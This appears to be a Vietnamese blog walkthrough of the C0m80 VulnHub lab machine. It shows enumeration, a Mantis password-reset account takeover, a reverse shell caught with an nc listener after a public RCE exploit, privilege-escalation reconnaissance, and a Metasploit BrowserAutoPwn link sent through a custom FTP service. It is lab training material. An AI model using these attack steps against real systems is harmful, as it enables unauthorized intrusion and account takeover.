class="line">Target: http://10.10.10.12/</span><br><span class="line"></span><br><span class="line">[10:05:09] Starting: </span><br><span class="line">[10:05:13] 200 -   17KB - /LICENSE.txt</span><br><span class="line">[10:05:13] 200 -    1KB - /README.txt</span><br><span class="line">[10:05:14] 301 -  236B  - /_vti_bin  -&gt;  http://10.10.10.12/_vti_bin/</span><br><span class="line">[10:05:14] 200 -    0B  - /_vti_bin/</span><br><span class="line">[10:05:14] 301 -  236B  - /_vti_cnf  -&gt;  http://10.10.10.12/_vti_cnf/</span><br><span class="line">[10:05:14] 200 -    0B  - /_vti_cnf/</span><br><span class="line">[10:05:14] 200 -    0B  - /_vti_log/</span><br><span class="line">[10:05:14] 301 -  236B  - /_vti_log  -&gt;  http://10.10.10.12/_vti_log/</span><br><span class="line">[10:05:18] 301 -  234B  - /assets  -&gt;  http://10.10.10.12/assets/</span><br><span class="line">[10:05:18] 200 -    1KB - /assets/</span><br><span class="line">[10:05:18] 301 -  231B  - /bin  -&gt;  http://10.10.10.12/bin/</span><br><span class="line">[10:05:18] 200 -    0B  - /bin/</span><br><span class="line">[10:05:19] 301 -  232B  - /bugs  -&gt;  http://10.10.10.12/bugs/</span><br><span class="line">[10:05:21] 301 -  231B  - /dev  -&gt;  http://10.10.10.12/dev/</span><br><span class="line">[10:05:21] 200 -    0B  - /dev/</span><br><span class="line">[10:05:21] 200 -   15KB - /favicon.ico</span><br><span class="line">[10:05:22] 301 -  234B  - /images  -&gt;  http://10.10.10.12/images/</span><br><span class="line">[10:05:22] 200 -    3KB - /images/</span><br><span class="line">[10:05:22] 200 -    8KB - /index.html</span><br><span class="line">[10:05:24] 200 -  403B  - /manifest.json</span><br></pre></td></tr></table></figure>
<p>Quét lặp lại với các thư mục tìm được, tóm được thằng phpInfo ở đường dẫn <a target="_blank" rel="noopener" href="http://10.10.10.12/dev/info.php">http://10.10.10.12/dev/info.php</a>, rất rất nhiều thông tin giá trị được show ra trước mặt, có thể gần như khẳng cmn định là machine này đang sử dụng OS là Windows, hoặc chí ít thì cái dịch vụ này đang được chạy bởi <em>cái gì đó</em> trên nền Windows OS.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PHP Version 5.2.8</span><br><span class="line">MySQL version: 5.1.30</span><br><span class="line">bla bla</span><br></pre></td></tr></table></figure>
<p>Thêm nữa, trong uri <em>&#x2F;bugs</em>, Mantis Bug Tracker, cái này tôi cũng lần đầu gặp luôn :)) chả biết mọe gì về nó cả, chỉ biết là nó yêu cầu login, Okay, Google về nó xem sao.<br><img src="/2020/12/29/C0m801-vulnhub/pic2.png"></p>
<h3 id="Searchsploit"><a href="#Searchsploit" class="headerlink" title="Searchsploit"></a>Searchsploit</h3><p>Tìm kiếm với Searchsploit về thằng này để mò mẫm một hướng khai thác.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$ searchsploit mantis                                                                                                               </span><br><span class="line">----------------------------------------------------------------------------------------------------- ---------------------------</span><br><span class="line"> Exploit Title                                                                                       |  Path</span><br><span class="line">----------------------------------------------------------------------------------------------------- ---------------------------</span><br><span class="line">Mantis Bug Tracker 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution              | php/webapps/21727.txt</span><br><span class="line">Mantis Bug Tracker 0.19 - Remote Server-Side Script Execution                                        | php/webapps/24390.txt</span><br><span class="line">Mantis Bug Tracker 0.19.2/1.0 - &#x27;Bug_sponsorship_list_view_inc.php&#x27; File Inclusion                   | php/webapps/26423.txt</span><br><span class="line">Mantis Bug Tracker 0.x - Multiple Cross-Site Scripting Vulnerabilities                               | php/webapps/24391.txt</span><br><span class="line">Mantis Bug Tracker 0.x - New Account Signup Mass Emailing                                            | php/webapps/24392.php</span><br><span class="line">Mantis Bug Tracker 0.x/1.0 - &#x27;manage_user_page.php?sort&#x27; Cross-Site Scripting                        | php/webapps/27229.txt</span><br><span class="line">Mantis Bug Tracker 0.x/1.0 - &#x27;view_all_set.php&#x27; Multiple Cross-Site Scripting Vulnerabilities        | php/webapps/27228.txt</span><br><span class="line">Mantis Bug Tracker 0.x/1.0 - &#x27;View_filters_page.php&#x27; Cross-Site Scripting                            | php/webapps/26798.txt</span><br><span class="line">Mantis Bug Tracker 0.x/1.0 - Multiple Input Validation Vulnerabilities                               | php/webapps/26172.txt</span><br><span class="line">Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery        | php/webapps/5657.txt</span><br><span class="line">Mantis Bug Tracker 1.1.3 - &#x27;manage_proj_page&#x27; PHP Code Execution (Metasploit)                        | php/remote/44611.rb</span><br><span class="line">Mantis Bug Tracker 1.1.3 - Remote Code Execution                                                     | php/webapps/6768.txt</span><br><span class="line">Mantis Bug Tracker 1.1.8 - Cross-Site Scripting / SQL Injection                                      | php/webapps/36068.txt</span><br><span class="line">Mantis Bug Tracker 1.2.0a3 &lt; 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit) (1)     | multiple/webapps/41685.rb</span><br><span class="line">Mantis Bug Tracker 1.2.0a3 &lt; 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit) (2)     | php/remote/35283.rb</span><br><span class="line">Mantis Bug Tracker 1.2.19 - Host Header                                                              | php/webapps/38068.txt</span><br><span class="line">Mantis Bug Tracker 1.2.3 - &#x27;db_type&#x27; Cross-Site Scripting / Full Path Disclosure                     | php/webapps/15735.txt</span><br><span class="line">Mantis Bug Tracker 1.2.3 - &#x27;db_type&#x27; Local File Inclusion                                            | php/webapps/15736.txt</span><br><span class="line">Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset                                                      | php/webapps/41890.txt</span><br><span class="line">Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery                                         | php/webapps/42043.txt</span><br><span class="line">Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)                                   | php/webapps/48818.py</span><br><span class="line">----------------------------------------------------------------------------------------------------- --------------------------</span><br><span class="line">Shellcodes: No Results</span><br></pre></td></tr></table></figure>
<p>Tạm thời chưa biết MantisBT đang sử dụng ở đây là phiên bản bao nhiêu, chưa biết thì lại phải mò thôi. Nhìn quanh thì thấy có một lỗi cho phép đổi mật khẩu người dùng mà không cần qua xác thực, ảnh hưởng đến một loạt các phiên bản từ 1.3.0 đến 2.3.0, tức là khả năng cũng cao cái nủa nợ kia bị dính.<br><a target="_blank" rel="noopener" href="https://www.cvedetails.com/cve/CVE-2017-7615/">https://www.cvedetails.com/cve/CVE-2017-7615/</a><br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/41890">https://www.exploit-db.com/exploits/41890</a></p>
<p>Truy cập vào cái đường dẫn này <a target="_blank" rel="noopener" href="http://10.10.10.12/bugs/verify.php?id=1&confirm_hash=">http://10.10.10.12/bugs/verify.php?id=1&amp;confirm_hash=</a><br><img src="/2020/12/29/C0m801-vulnhub/pic3.png"><br>Với id&#x3D;1, trong trường username nhận được hiển thị là bob, đổi mật khẩu thì vẫn éo truy cập được, tăng cái param id lên 2 3 4 5, thì có được tài khoản của alice. Tạm thời đổi mật khẩu cùa bạn alice xinh đẹp thành 00000, và login vào xem trong này có gì.<br><img src="/2020/12/29/C0m801-vulnhub/pic4.png"><br>Lần mò trong đây một hồi để thó thêm thông tin, phiên bản MantisBT đang dùng là 2.3.0, đường dẫn là &#x2F;var&#x2F;www&#x2F;html…, ố ồ, đây là đường dẫn của linux system mà? Ở trên thì có thông tin cho thấy đây là Windows System. Như vậy thì có 2 khả năng ở đây. Một, đây là máy Windows OS, nhưng dịch vụ HTTP trên cổng 80 là chạy dưới một hệ giả lập của Linux OS. Hai, đây là máy Linux OS, và chạy giả lập dịch vụ FTP cổng 20021 nên Windows.<br>Gác lại vụ đó, quay sang khai thác lỗi RCE trên MantisBT mà <em>searchsploit</em> tìm thấy ở trên.<br>Up shell đồng thời bật lắng nghe trên máy ở cổng 22222.<br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/48818">https://www.exploit-db.com/exploits/48818</a><br><em>Code này chạy bằng python2, cần thêm lại một số thông tin trong hàm khởi tạo, có thể có lỗi khi chạy do syntax error hoặc gì gì đó, anh em chỉ cần sửa code để chạy cho đúng là xong &#x3D;))</em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ nc -nlvp 22222                                                                                  </span><br><span class="line">listening on [any] 22222 ...</span><br><span class="line">connect to [10.10.10.1] from (UNKNOWN) [10.10.10.12] 41396</span><br><span class="line">bash: cannot set terminal process group (2042): Inappropriate ioctl for device</span><br><span class="line">bash: no job control in this shell</span><br><span class="line">www-data@C0m80:/var/www/html/bugs$ id</span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br></pre></td></tr></table></figure>
<h3 id="Www-data-shell"><a href="#Www-data-shell" class="headerlink" title="Www-data shell"></a>Www-data shell</h3><p>Okay, có shell của www-data. Chắc kèo đây là máy Linux OS rồi. Chắc chắn hơn thì kiểm tra các dịch vụ đang chạy, thấy mấy dòng bên dưới là đủ biết rồi, hê hê, Linux OS, chạy giả lập ứng dụng Windows với <em>wine</em>.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">b0b       2226  0.0  0.3 1597352 3604 pts/7    S+   02:05   0:00 /ftpsvr/bestFTPserver.exe                                                              </span><br><span class="line">b0b       2229  0.0  0.4   8352  4716 ?        Ss   02:05   0:00 /opt/wine-stable/bin/wineserver</span><br><span class="line">b0b       2239  0.0  0.4 1599240 4940 ?        Ssl  02:05   0:00 C:\windows\system32\services.exe                                                              </span><br><span class="line">b0b       2247  0.0  0.6 1604640 6660 ?        Sl   02:05   0:00 C:\windows\system32\winedevice.exe                                                              </span><br><span class="line">b0b       2262  0.0  0.2 1597752 2448 ?        Sl   02:05   0:00 C:\windows\system32\plugplay.exe </span><br></pre></td></tr></table></figure>
<h2 id="Get-Root-shell"><a href="#Get-Root-shell" class="headerlink" title="Get Root shell"></a>Get Root shell</h2><h3 id="Www-data-shell-1"><a href="#Www-data-shell-1" class="headerlink" title="Www-data shell"></a>Www-data shell</h3><p>Liệt kê xem các user nào có mặt trong đây. Thấy 2 cái tên quen thuộc là b0b và al1ce.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">libuuid:x:100:101::/var/lib/libuuid:</span><br><span class="line">syslog:x:101:104::/home/syslog:/bin/false</span><br><span class="line">messagebus:x:102:105::/var/run/dbus:/bin/false</span><br><span class="line">landscape:x:103:109::/var/lib/landscape:/bin/false</span><br><span class="line">sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin</span><br><span class="line">usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false</span><br><span class="line">avahi:x:106:113:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false</span><br><span class="line">dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false</span><br><span class="line">colord:x:108:116:colord colour management daemon,,,:/var/lib/colord:/bin/false</span><br><span class="line">pulse:x:109:117:PulseAudio daemon,,,:/var/run/pulse:/bin/false</span><br><span class="line">rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false</span><br><span class="line">debian-spamd:x:111:121::/var/lib/spamassassin:/bin/sh</span><br><span class="line">gdm:x:112:122:Gnome Display Manager:/var/lib/gdm:/bin/false</span><br><span class="line">avahi-autoipd:x:113:125:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false</span><br><span class="line">hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false</span><br><span class="line">kernoops:x:115:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false</span><br><span class="line">saned:x:116:126::/home/saned:/bin/false</span><br><span class="line">whoopsie:x:117:127::/nonexistent:/bin/false</span><br><span class="line">speech-dispatcher:x:118:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh</span><br><span class="line">vboxadd:x:999:1::/var/run/vboxadd:/bin/false</span><br><span class="line">b0b:x:1000:1001: :/home/b0b:/bin/bash</span><br><span class="line">mysql:x:119:128:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">xrdp:x:120:129::/var/run/xrdp:/bin/false</span><br><span class="line">al1ce:x:1001:34::/home/al1ce:/bin/dash</span><br><span class="line">postfix:x:121:130::/var/spool/postfix:/bin/false</span><br><span class="line">statd:x:122:65534::/var/lib/nfs:/bin/false</span><br></pre></td></tr></table></figure>
<p>Phiên bản kernel hiện tại là 3.13.0, phiên bản này khá cũ đấy, có sẵn mã khai thác cho phép leo thang đặc quyền root ở trên exploitdb.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">www-data@C0m80:/etc/w3m$ uname -a</span><br><span class="line">Linux C0m80 3.13.0-129-generic #178-Ubuntu SMP Fri Aug 11 12:49:13 UTC 2017 i686 i686 i686 GNU/Linux</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/37292">https://www.exploit-db.com/exploits/37292</a><br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/37293">https://www.exploit-db.com/exploits/37293</a></p>
<p>Mò mẫm vào thư mục của b0b để recon thêm thông tin.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">www-data@C0m80:/home/b0b$ cd Desktop</span><br><span class="line"></span><br><span class="line">www-data@C0m80:/home/b0b/Desktop$ ls -al</span><br><span class="line">total 32</span><br><span class="line">drwxr-xr-x  2 b0b b0b 4096 Sep 22  2017 .</span><br><span class="line">drwxr-xr-x 21 b0b b0b 4096 Dec 31 02:05 ..</span><br><span class="line">-rw-rw-r--  1 b0b b0b   86 Sep 22  2017 .save~</span><br><span class="line">-rwxr-xr-x  1 b0b b0b  318 Sep 19  2017 Mozilla Firefox.desktop</span><br><span class="line">lrwxrwxrwx  1 b0b b0b   19 Sep 22  2017 b0b&#x27;s Documents -&gt; /home/b0b/Documents</span><br><span class="line">-rwxr-xr-x  1 b0b b0b  281 Sep 22  2017 bestFTPserver.exe.desktop</span><br><span class="line">-rwxr-xr-x  1 b0b b0b  227 Sep 22  2017 cmd.exe.desktop</span><br><span class="line">-rw-rw-r--  1 b0b b0b  362 Sep 22  2017 notes.txt</span><br><span class="line">-rw-rw-r--  1 b0b b0b   73 Sep 22  2017 pwds.txt</span><br><span class="line"></span><br><span class="line">www-data@C0m80:/home/b0b/Desktop$ cat notes.txt</span><br><span class="line">These are my notes...</span><br><span class="line">---------------------</span><br><span class="line">I prefer the old fasioned ways of doing things if I&#x27;m honest</span><br><span class="line">1. Remember to prank Jeff with Alice :D</span><br><span class="line">2. Buy Metallica tickets for me and Alice for next month.</span><br><span class="line">3. Call Mom for her birthday on Thursday, and remeber to take flowers at the weekend.</span><br><span class="line">4. Draft a resignation letter as Jeff to send to Mr Cheong. LOL :D</span><br><span class="line"></span><br><span class="line">www-data@C0m80:/home/b0b/Desktop$ cat pwds.txt</span><br><span class="line">cat pwds.txt</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="comment"># Reminder to self!</span></span></span><br><span class="line">I moved all my passwords to a new password manager</span><br></pre></td></tr></table></figure>
<p>Phải nói là thằng bob này khá là quý alice &#x3D;)) mua vé xem phim cho 2 đứa. Và thêm nữa, một cái đáng chú ý bob tự note cho bản thân là nhớ mật khẩu đã được chuyển tới một trình quản lý mật khẩu mới. Đây có thể là một cái hint. Vì với một bài CTF thì không có gì là ngẫu nhiên cả.<br>Câu hỏi bỏ ngỏ ở đây, trình quản lý mật khẩu ấy là gì?<br>Qua thư mục của al1ce xem thế nào.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">www-data@C0m80:/home/al1ce$ ls -al</span><br><span class="line">total 16</span><br><span class="line">drwxr-xr-x 3 root  root   4096 Sep 23  2017 .</span><br><span class="line">drwxr-xr-x 4 root  root   4096 Sep 23  2017 ..</span><br><span class="line">drwxr-xr-x 2 root  root   4096 Sep 23  2017 .ssh</span><br><span class="line">-rwxr-xr-x 1 al1ce backup  108 Sep 23  2017 makebkp.sh</span><br><span class="line"></span><br><span class="line">www-data@C0m80:/home/al1ce$ cat makebkp.sh</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">I wrote a quick tool <span class="keyword">for</span> you bob</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">this will backup the ftp app file to the net share</span></span><br><span class="line">makebkp</span><br><span class="line"></span><br><span class="line">www-data@C0m80:/home/al1ce$ locate makebkp</span><br><span class="line">/bin/makebkp</span><br><span class="line">/home/al1ce/makebkp.sh</span><br><span class="line">/usr/local/bin/makebkp</span><br><span class="line"></span><br><span class="line">www-data@C0m80:/home/al1ce$ file /bin/makebkp</span><br><span class="line">/bin/makebkp: setuid, setgid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=aafa18fde98338ee8cfa6567ac43d9b280047b53, not stripped</span><br><span class="line"></span><br><span class="line">www-data@C0m80:/home/al1ce$ strings /bin/makebkp</span><br><span class="line">/lib/ld-linux.so.2</span><br><span class="line">... blablabla ...</span><br><span class="line">date &gt; /ftpsvr/bkp/ftp104.bkp &amp;&amp; \</span><br><span class="line">python -c &#x27;print(&quot;-&quot; * 66)&#x27;&gt;&gt; /ftpsvr/bkp/ftp104.bkp &amp;&amp; \</span><br><span class="line">xxd -E /ftpsvr/bestFTPserver.exe &gt;&gt; /ftpsvr/bkp/ftp104.bkp &amp;&amp; \</span><br><span class="line">python -c &#x27;print(&quot;-&quot; * 66)&#x27;&gt;&gt; /ftpsvr/bkp/ftp104.bkp &amp;&amp; \</span><br><span class="line">xxd -E /ftpsvr/bfsvrdll.dll &gt;&gt; /ftpsvr/bkp/ftp104.bkp &amp;&amp; \</span><br><span class="line">chown backup:backup /ftpsvr/bkp/ftp104.bkp</span><br><span class="line">... blablabla ...</span><br><span class="line">_init</span><br></pre></td></tr></table></figure>
<p>Dòng này quan trọng đấy, nó tạo ra cái file <em>ftp104.bkp</em> ở trên tìm được khi mount thư mục NFS. Và đấy là lý do tại sao khi convert lại thì bị lỗi &#x3D;)). Look at that!</p>
<ul>
<li>Đầu tiên là <em>date</em> được ghi vào <em>&#x2F;ftpsvr&#x2F;bkp&#x2F;ftp104.bkp</em>.</li>
<li>Tiếp, 66 cái gạch ngang được ghi vào :)) đù mé, chắc để cho phân biệt các phần.</li>
<li>Hexdump của <em>&#x2F;ftpsvr&#x2F;bestFTPserver.exe</em> được nối vào dưới.</li>
<li>Lại tiếp tục 66 cái dấu gạch.</li>
<li>Cuối cùng là hexdump của <em>&#x2F;ftpsvr&#x2F;bfsvrdll.dll</em> được thêm vào cuối cùng.</li>
</ul>
<p>Thế là về cơ bản, đã có toàn bộ hexdump của cả file thực thi (<em>.exe</em>) và thư viện đi kèm với nó (<em>.dll</em>), khôi phục lại <em>bestFTPserver.exe</em> và <em>bfsvrdll.dll</em> để có thể chạy mô phỏng lại dịch vụ FTP này. Ơ thế chạy mô phỏng đề làm mẹ gì? Để biết được cái hệ thống thật kia nó chạy như nào chứ sao nữa.<br>Kết nối với FTP trên cổng 20021 của machine xem có gì.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">ftp 10.10.10.12 20021</span>                                                                          </span><br><span class="line">Connected to 10.10.10.12.</span><br><span class="line">220 bestFTPserver 1.0.4 ready...</span><br><span class="line">Name (10.10.10.12:#####): </span><br><span class="line"><span class="meta prompt_">ftp&gt;</span><span class="language-bash">331 Anonymous login OK, send your e-mail as password</span></span><br><span class="line">Login failed.</span><br><span class="line"><span class="meta prompt_">ftp&gt; </span><span class="language-bash"><span class="built_in">dir</span></span></span><br><span class="line"><span class="meta prompt_">ftp&gt;</span><span class="language-bash">502 Unknown ftp <span class="built_in">command</span></span></span><br><span class="line"><span class="meta prompt_">ftp&gt; </span><span class="language-bash"><span class="built_in">ls</span></span></span><br><span class="line"><span class="meta prompt_">ftp&gt;</span><span class="language-bash">502 Unknown ftp <span class="built_in">command</span></span></span><br><span class="line"><span class="meta prompt_">ftp&gt; </span><span class="language-bash"><span class="built_in">exit</span></span></span><br><span class="line"><span class="meta prompt_">ftp&gt;</span><span class="language-bash">TryHarder ;D</span></span><br></pre></td></tr></table></figure>
<p>Cái này thì xương máu mà nói, tôi thử hết rồi, tất cả lệnh đều bị chặn lại hết. Nó chặn thế nào, chặn kiểu gì, thì phải xem nó làm gì, làm như nào. Nhắc lại trên là đã có <em>bestFTPserver.exe</em> và <em>bfsvrdll.dll</em> để chạy mô phỏng, giờ reverse nó với Ollydbg.</p>
<p>Tôi là thằng đéo biết gì về reverse, nên là chỉ lướt qua qua mấy cái string ASCII, xem nó nhảy vào đâu, gọi cái gì… Tóm cái váy lại, FTP này thực hiện khá là đơn giản, đúng như cái tên, <em>bestFTPserver</em>, việc của nó là so sánh các chuỗi lệnh nhập vào, éo làm gì cả, hiển thị ra thông báo lỗi luôn &#x3D;)). Có vài lệnh thì in ra văn bản (<em>system, ls…</em>).</p>
<p>Nhưng đoạn này, với các input với mở đầu là http hoặc https, nó sẽ thực hiện lệnh <code>explorer</code> để mở đường dẫn với trình duyệt mặc định.</p>
<blockquote>
<p>Lệnh explorer trên Windows để gọi đến trình quản lý file (File Explorer), nhưng nếu tham số đầu vào là một đường link, nó sẽ gọi đến trình duyệt (browser) và truy cập vào đường link đó.</p>
</blockquote>
<p>Chưa rõ được trình duyệt mặc định ở đây là gì, nãy ngó qua thư mục Desktop thì có thấy Firefox. Kiểm tra phiên bản của Firefox xem có dính CVE nào không.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">www-data@C0m80:/home/b0b/.wine/drive_c/Program Files/Mozilla Firefox$ cat install.log                 </span><br><span class="line">...</span><br><span class="line">Mozilla Firefox Installation Started: 2017-09-19 4:27:27</span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">Installation Details</span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">  Install Dir: C:\Program Files\Mozilla Firefox</span><br><span class="line">  Locale     : en-US</span><br><span class="line">  App Version: 13.0.1</span><br><span class="line">  GRE Version: 13.0.1</span><br><span class="line">  OS Name    : Windows XP</span><br><span class="line">  Target CPU : x86</span><br></pre></td></tr></table></figure>
<p>Chết nhé, phiên bản Firefox đang là 13.0.1, quá cũ, đi kèm với sự cũ kỹ này là một đống lỗi RCE. Giờ thì bằng cách nào đó, gửi cho machine một đường link bằng cái FTP lởm kia, Firefox truy cập vào, lấy được shell.<br><a target="_blank" rel="noopener" href="https://www.cvedetails.com/vulnerability-list/vendor_id-452/product_id-3264/version_id-136386/Mozilla-Firefox-13.0.1.html">https://www.cvedetails.com/vulnerability-list/vendor_id-452/product_id-3264/version_id-136386/Mozilla-Firefox-13.0.1.html</a></p>
<h3 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h3><p>Ở đây tôi dùng module auto_pwned của metasploit, đại khái là nó sẽ tạo ra một loạt các kịch bản khai thác sẵn có và nhét hết vào 1 đường link, sau khi trình duyệt truy cập vào, nếu có lỗi khớp với các kịch bản khai thác đang được chạy, metasploit sẽ lấy về một hoặc nhiều session (hiểu là shell) trên máy nạn nhân, lấy được bao nhiêu thì còn tùy vào số lỗi có thể khai thác.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[+] Please use the following URL for the browser attack:</span><br><span class="line">[+] BrowserAutoPwn URL: http://10.10.10.1:8080/eKl8aErr</span><br><span class="line">[*] Server started.</span><br></pre></td></tr></table></figure>
<p>Copy cái URL kia rồi bắn sang FTP.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ftp&gt;http://10.10.10.1:8080/eKl8aErr</span><br><span class="line">BugReport Link Sent to Bob...</span><br></pre></td></tr></table></figure>
<p>Okay, vậy là Firefox có dính 2 lỗi RCE thật, nhưng éo lấy được session nào cả! TẠI SAO?</p>
